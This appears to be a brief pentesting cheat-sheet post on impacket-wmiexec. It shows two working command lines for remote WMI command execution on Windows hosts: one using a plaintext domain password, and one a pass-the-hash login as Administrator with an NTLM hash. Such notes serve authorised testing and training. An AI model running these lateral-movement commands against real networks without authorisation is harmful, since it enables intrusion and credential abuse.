ToolsFebruary 9, 2026|1 min read|by 0xt0pus

impacket-wmiexec

Remote command execution using WMI for stealthy lateral movement without writing to disk

#active-directory #windows #impacket #lateral-movement

Impacket-wmiexec

Description

Impacket-wmiexec is used for remote command execution on Windows machines via WMI (Windows Management Instrumentation). It does not create a service like psexec, making it slightly stealthier.

Usage 1: Execute Command with Credentials

Command:

impacket-wmiexec DOMAIN/username:Password@TARGET "net user"

Usage 2: Pass the Hash

Command:

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.145.72